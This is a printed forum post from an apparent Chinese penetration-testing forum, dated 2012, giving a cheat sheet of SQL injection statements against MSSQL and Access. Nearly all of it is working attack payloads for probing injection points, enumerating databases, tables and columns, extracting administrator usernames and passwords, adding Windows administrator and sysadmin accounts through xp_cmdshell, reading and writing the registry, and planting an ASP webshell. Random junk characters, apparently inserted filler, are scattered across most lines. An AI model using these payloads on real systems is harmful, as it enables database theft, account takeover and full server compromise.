中国网络渗透测试联盟

标题: SQL注入常用语句 [打印本页]

作者: admin    时间: 2012-9-15 14:31
标题: SQL注入常用语句
1.判断是否有注入
$ M0 c+ p/ u3 P% |$ a1 W5 u;and 1=1 5 X; |7 x6 s' A$ j: v. \
;and 1=2 ) U0 v6 W; C! o
" R1 p, L0 p, M" r& C6 ]
2.初步判断是否是mssql 4 g, E, W# U$ f( G7 t
;and user>0
+ ]& B1 a( n! b* Z/ s5 C  G' q; }
3.判断数据库系统
7 }, i7 l; b% m7 C; j, m  T7 M;and (select count(*) from sysobjects)>0 mssql
5 T8 T1 [# k& T" m# j;and (select count(*) from msysobjects)>0 access 9 |3 M% Q0 e0 v) A
0 h9 B$ y" f; G( O2 Y
4.注入参数是字符
; c  M2 C+ B5 E7 S: J! O8 _5 t' i'and [查询条件] and ''=' 6 w  b3 x1 r3 n0 z& }8 |5 S/ ^0 R
3 G6 c3 `6 [6 r! O3 Q* B$ Q( r" W
5.搜索时没过滤参数的
* i; D+ F; y* m/ _'and [查询条件] and '%25'='
+ u$ o  w6 z" |9 f- g: ~3 t6 m& j* L
6.猜数表名 # W3 Y2 U8 P* ^. B; K" L) O
;and (select Count(*) from [表名])>0
, Y: K5 Q: V; O% [9 f+ O
7 B) O6 @. U2 M- Z( _; ~7 H7.猜字段 1 n$ l% b9 D: H9 p- r) |5 O
;and (select Count(字段名) from 表名)>0 % V) ~8 _: c2 V3 e/ j7 }
- ^! J. H' ~, n/ X9 ~# f) `6 Q
8.猜字段中记录长度 + q1 {0 Y; ]: i
;and (select top 1 len(字段名) from 表名)>0 7 C& [3 _: p0 m+ H) P) q) n
/ j! k5 U( l# G' t0 E
9.(1)猜字段的ascii值(access) ! R, u& o( p- b( J1 G
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0 - z; r: {) r. e

! b% a) P+ i9 ?! a# Q( Q(2)猜字段的ascii值(mssql) 6 M# [2 O9 v+ g2 z0 N- O
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0 - s' d7 d5 V6 R5 A- ^% W
, ?7 w# m, i6 V8 _
10.测试权限结构(mssql)
: c- a, Q7 _" t2 M- l;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
3 T8 z& p' ?" p& N;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 1 p/ A9 k$ m1 w1 D7 X8 s0 K
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
1 X; N0 {7 O6 A;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- + h# c) F9 n$ ?* G; S
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
2 b6 ~3 I! P# ~& M! z& b2 F, T;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
$ m, d* ]4 i6 X% x* S5 b;and 1=(select IS_MEMBER('db_owner'));--
9 s/ u. T! f, u: W! c& `$ Z! ~
& w6 T- T8 q- F4 Q/ S* \: ?( o11.添加mssql和系统的帐户
. ^8 B' V7 D2 f- q: };exec master.dbo.sp_addlogin username;-- / M" N: w$ E0 ^
;exec master.dbo.sp_password null,username,password;--
/ P' a! k9 p; o) k3 W9 q9 M;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 8 _' m" U5 i, c" w
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- / f7 q" K0 U+ \  |7 {, }
;exec master.dbo.xp_cmdshell 'net user username password /add';--
, L6 f& g" x# C1 ?+ c;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ' q! F8 p* L8 |, w; @7 g

  s6 u6 A% T/ Z3 j6 Y! j0 {12.(1)遍历目录 / _- I" L& g# F: _* y$ u# a
;create table dirs(paths varchar(100), id int) 5 I; l. D1 x! [  q' p! p
;insert dirs exec master.dbo.xp_dirtree 'c:\'
; p, E& S& Y% F# ~9 z# u# \;and (select top 1 paths from dirs)>0 * ^% P, G, i8 L/ y* U& a4 w
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
8 c) H+ D$ T/ m4 x$ V* j  u
' l# i0 K* |9 y; h* Y) T(2)遍历目录 1 m, r+ A7 e  P2 t# {: t) b
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
4 t% b6 _: x9 L5 B8 t8 d' r;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 3 _8 r# ?  l- m( R
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
7 }. K+ ^* l5 e8 X2 B1 [;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构 5 m0 P* |& P3 q
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 , b6 Z2 P" U& H7 b, i! c4 J

9 L; {, n  }/ M; i13.mssql中的存储过程 1 V* l/ r* \, j/ M
xp_regenumvalues 注册表根键, 子键
: W% e! b8 b) o;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
2 _7 Q! [3 j  K8 I2 _7 {xp_regread 根键,子键,键值名 0 g8 I( p) ?1 D* j/ g( B0 O
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 2 p# m$ E9 U4 y0 R) V. Q
xp_regwrite 根键,子键, 值名, 值类型, 值 8 l6 E; m6 L* M5 c% }. X( L
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 " `' {) }. @, I  L9 o
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName','reg_sz','hello' 写入注册表
% f5 `' Q1 g3 k2 ?6 d/ fxp_regdeletevalue 根键,子键,值名 ' ?) d" z7 A: L& P% d9 W6 E" V
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' 删除某个值 ; C' n' U9 w8 u9 g$ _+ H: M
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
) m% _4 j  I7 P4 D# P( F3 O; k) Q
' N2 @, X/ i" V/ U# I' X14.mssql的backup创建webshell
8 k. u. B( v  Z/ W2 E, wuse model
! y* r% q* x/ b) y- I# vcreate table cmd(str image); 2 V  _9 M2 M3 }! k3 G5 r1 i
insert into cmd(str) values ('<% Dim oScript %>'); / I6 e0 u# l! V1 g
backup database model to disk='c:\l.asp'; % d& r5 k- W7 h  U9 y, h0 c$ b, ^
# T% `  b5 Y" v, l) V( j1 k
15.mssql内置函数
7 t$ D/ ^* a& I& f;and (select @@version)>0 获得Windows的版本号 0 q* l$ t' ?, x2 K
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
3 W+ D, o0 x2 `. f7 w* {! t;and (select user_name())>0 爆当前系统的连接用户 0 ^5 G; @7 o: z5 G! b& O
;and (select db_name())>0 得到当前连接的数据库
# p$ t/ T7 I0 s
* l2 r7 F6 g+ ~- N6 J7 a; Q: V/ ?/ |% z) X, \

# g' ]7 V$ V' q3 pMSSQL手注暴库* e  Y1 Z# K; @3 Z

/ V/ L7 h* l+ G1.暴出当前表名和列名
: i( g' `. `* x3 w2 Q  e& t6 u在注入点后提交“'having 1=1--",得到返回信息为英文,在这段英文中即可看到一个表名和一个列名。提交“group by 暴出的表名列名having 1=1--",可得到另一个列名;继续提交“group by 暴了的表名列名,暴出的表名.第2个列名 having 1=1--",可再得到一个列名。用同样的方法提交,直到页面不再返回错误信息,就可以得到所有的列名。小知识:暴表名与列名是在SQL语句中“having 1=1—"与GROUP BY结合使用,进行条件判断的。由于语句不完整,因此数据库返回错误信息,并显示一个表名和一个列名。基本方法只能暴出数据库中的当前表,如果某个表中包含的列名非常多,用上基本方法就非常困难了。
: Q& R* _2 j# y/ t
- l0 W/ ?  M6 R1 }. M* r第一.爆出所有数据库名
5 E# o3 [; x7 ?. h. @& l9 V# k& Q利用“and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])"语句,暴出数据库中任意表名和列名,其中“[N]"表示数据库中的第N个表。1 t% w2 ^/ @9 |% N% x4 |0 O& w
第一步:在注入点后提交如下语句:“and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=12)",因为 dbid 的值从1到5,是系统使用的,所以用户自己建的一定是从6开始的,并且我们提交了 name>1,name字段是一个字符型的字段,和数字比较会出错因此在提交后,IE会返回如下的信息:“Microsoft OLE DB Provider for ODBC Drivers 错误 ?e07' [Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Northwind' 转换为数据类型为 int 的列时发生语法错误。",这样就把name字段的值暴出来了,也就是我们得到了一个库名“Northwind"。改变“dbid"的值可以得出所有的库名。
  I! t( Q  N8 r( R, X+ @4 u1 c
6 a. S9 _4 R" Land 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])--  修改N从6开始爆出所有数据库名. V- Q6 V! {' A& I! W" I

$ t, ]) i1 `% x% Z, P- i. d+ V8 @9 |, ?  W# z1 A4 ~" S8 F8 ]5 D2 g9 @7 g
第二.爆出指定库中的所有表名
) m3 i: g* z. N, i得到了库名后,现在要得到库中所有的表名,提交如下语句:"and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U') ",这里要暴的是master这个库中的表名,查询的SQL语句返回的是name的值,然后和数字0比较,这样就会暴露出name的值。提交后一个表名为“'spt_monito"就被暴出来了。
  \% b% u$ F, K* E4 Q9 f% k再接着暴其他的表,继续提交如下语句:“and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U' and name not in('spt_monito'))"提交后,又暴出一个表名为"cd512"。依次提交"and name not in(' spt_monito',' cd512',..))"就可以查出所有的表名。
: w6 W6 [+ u) O2 O
! p: y2 X6 `/ z  I4 tand 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U')--
3 t! C' U, W9 M: h9 H0 Uand 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U' and name not in('[爆出的表名]'))--
0 X6 X' u5 _) S7 |' W) O5 fand 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U' and name not in('[爆出的表名]','[爆出的第二表名]'))--
0 b3 m7 n/ A* N4 [6 E( u5 n3 n* z, N( z% P$ N: q7 A7 y
4.爆出指定表中的所有列名/ S( X" l" B3 V7 C" x, r( m5 h0 t5 ?
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) # s- P  l8 D* @6 l. [4 m
//把ID值转成字符型后再和一个整型值比较。ID号出来了。值为:949578421  name='表名'
  \/ A* j+ b2 H
4 r' k; `& T- P$ T  q+ a; o5 ~and 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421)--  爆出admin表中的一个字段名
: N0 m0 L( t& _. t& o( d
) y. g3 h' E' y7 |* V4 q1 C再提交and 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421 and name not in('adduser'))-- 7 P' F/ M4 Y& f7 K8 q
依次提交"and name not in(' spt_monito',' cd512',..))"就可以查出admin表中的所有字段名。- t% q; ]1 f" I# ]  R* }+ U2 Y

- x/ f9 ~0 e9 R
+ N  l1 w. a2 b. M0 X) U. cand 0<>(select count(*) from [指定库名].dbo.sysobjects where xtype='U' and name='[要爆字段的表名]' and uid>(str(id)))--  爆出要爆字段的表名id值* ?8 r* H6 y, I; u. X5 W+ w* Y
2 J4 G4 y  f4 H7 _' K
and 0<>(select top 1 name from [指定库名].dbo.syscolumns where id=爆出的id值)-- 爆出id值表中的一个字段名, K* Z$ R. S# C' j1 B* F, f
0 W; S$ r( @; g% D- P1 F
and 0<>(select top 1 name from [指定库名].dbo.syscolumns where id=爆出的id值 and name not in('[爆出的字段名]'))-- - W& u: c0 Y- R' J7 ^, Z3 U' F$ v
! |4 t! v8 F+ d$ r% b& P
) `$ c) M, }3 A0 j& I
9 k: R2 H/ a1 J+ [4 S0 _+ ~2 y
5.读取指定表中的数据
1 _0 L0 r) q; ?: _" _
) }& C" T6 ^0 S$ c2 Kand 0<(select A_ID from wutong.dbo.admin where A_UserID>1)-- 爆出A_PWD的内容
6 k, [1 {6 H+ v  ]" _' S
; j  g/ _, v* {# l: K8 j" M7 band 0<(select [一个存在的字段] from [指定库名].dbo.[要查询的表名] where [要爆内容的字段名]>1)--+ G% V) O3 {5 r% `5 D0 D

! M3 @+ {" M! [2 Fand 0<(select A_ID from wutong.dbo.admin where A_PWD>1 and A_UserID='admin')-- 爆出admin的密码% u& t9 a& }; M* d3 q3 c8 h, l+ K
- T4 \  p( \& i: l8 [
" h% I) x  g' F: _, b/ B
and 0<(Select Top 1 A_UserID FROM admin where A_ID<>1)--  爆出id<>1的管理员名字(fuhao)) l* E" z, b# ^* ?8 K
8 z6 p4 ?" [& t+ O
and 0<(Select Top 1 A_UserID FROM admin where A_ID <>1 and A_UserID <> 'fuhao')-- 爆出第二个管理员的名字 <>不等于(tuiguang)' p+ V3 M. c0 D/ r; k
5 r- \2 e' P8 R! L: ?0 l
and 0<(Select Top 1 A_UserID FROM admin where  A_ID <>1 and A_UserID <> 'fuhao'and A_UserID <> 'tuiguang')--) |' C" y) y9 P! R% h4 K1 b$ A

3 y1 O( }; M* I. j) n3 d9 @知道了数据库的表名、列名后,可以利用“查询语句"读取数据库中的任意信息。例如要读取某个表中某列中的第N个数据,可提交语句:“and (Select Top 1 列名 FROM 表名 where id=[N])>1"( [N]代表列中的第N条数据),从IE返回信息中即可得知想要的数据。' S" Z/ l3 F# b+ `( t





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2